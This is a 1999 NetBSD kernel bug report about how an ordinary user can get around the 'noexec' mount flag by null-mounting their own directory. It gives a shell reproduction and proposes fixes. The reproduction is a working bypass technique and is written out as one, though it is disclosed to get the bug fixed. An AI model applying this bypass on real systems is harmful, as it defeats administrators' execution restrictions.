Subject: kern/7129: normal user can bypass mount 'noexec' flags
To: None <gnats-bugs@gnats.netbsd.org>
From: Manuel Bouyer <bouyer@antioche.lip6.fr>
List: netbsd-bugs
Date: 03/11/1999 16:52:50
>Number:         7129
>Category:       kern
>Synopsis:       normal user can bypass mount 'noexec' flags
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    kern-bug-people (Kernel Bug People)
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Thu Mar 11 08:05:00 1999
>Last-Modified:
>Originator:     Manuel Bouyer
>Organization:

LIP6, Universite Paris VI.

>Release:        1.3.3 and the 1.3I i386 snapshot
>Environment:

System: NetBSD antifer.ipv6.lip6.fr 1.3.3 NetBSD 1.3.3 (ANTIFER) #1: Sun Feb 28 17:30:48 MET 1999 bouyer@antifer.ipv6.lip6.fr:/usr/src/NetBSD/src/sys/arch/i386/compile/ANTIFER i386

>Description:
	It is possible for a normal user to bypass the 'noexec' mount flag,
	by using a null mount on a directory owned by itself.
>How-To-Repeat:
	garfield:/cd1>id
	uid=331(bouyer) gid=100 groups=100, 0(wheel)
	garfield:/cd1>pwd 
	/cd1
	garfield:/cd1>mount | fgrep cd1
	/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
	garfield:/cd1>ls -l
	total 3
	-rwxr-xr-x   1 bouyer  wheel   30 Mar 11 16:39 toto.sh
	garfield:/tmp/d>cat toto.sh 
	#! /bin/sh
	echo "not good !"

	garfield:/cd1>./toto.sh 
	./toto.sh: Permission denied.
	garfield:/cd1>mkdir /tmp/d
	garfield:/cd1>mount -t null /cd1 /tmp/d
	garfield:/cd1>cd !$
	cd /tmp/d
	garfield:/tmp/d>./toto.sh 
	not good !

>Fix:
	Workaround: assure no regular user can execute a binary in a partition
	they can write (what's the purpose of 'noexec' otherwise ?), and
	supress read/execute permissions on /sbin/mount_* for all but owner.

	A long term fix needs to change the semantic of mount for non-root
	users: 
	- mounts for non-root users are always 'noexec' (as they already are
	  'nodev, nosuid'), possibly dependant on the kernel security level
	- or inherit the noexec flag from the partition the target directory
	  will be mounted on.
>Audit-Trail:
>Unformatted: